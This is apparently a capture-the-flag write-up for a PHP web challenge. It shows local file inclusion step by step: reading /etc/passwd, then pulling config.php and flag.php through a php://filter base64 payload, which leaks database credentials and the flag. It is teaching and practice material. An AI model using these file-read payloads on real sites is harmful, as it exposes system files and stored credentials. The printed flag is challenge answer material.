AUCHALL - [Web] - Intro
Challenge Description
The Introductions have to be really easy, no?
Solution
On opening the challenge we were given input
If we give /etc/passwd as input we get its output so it shows that it is using some sort of include() function to load file
Typically in php applications we use config.php file to store databases credentials
lets check config.php
we got no output which means we need to use php filter to convert the output into base64
php://filter/convert.base64-encode/resource=config.php
On decoding the base64 output we got database credentials
<?php
$host = "127.0.0.1";
$user = "the_user";
$pass = "%as21k.amu2SAVS51";
$db = "cy243l";
/*
In a recent scan, I found out that the db user and the machine user had exact same usernames and passwords.
Do ping me once you've changed it.
*/
?>
But wait we need flag. Where is the flag?
I tried checking for flag.php
php://filter/convert.base64-encode/resource=flag.php
Flag
Flag is dynamic
CY243L{b4s1c_lf1_f1lt3r_r3ad_eb8c9DD_eUcS_wIHW}
Writeups 2023 © RootxRAN.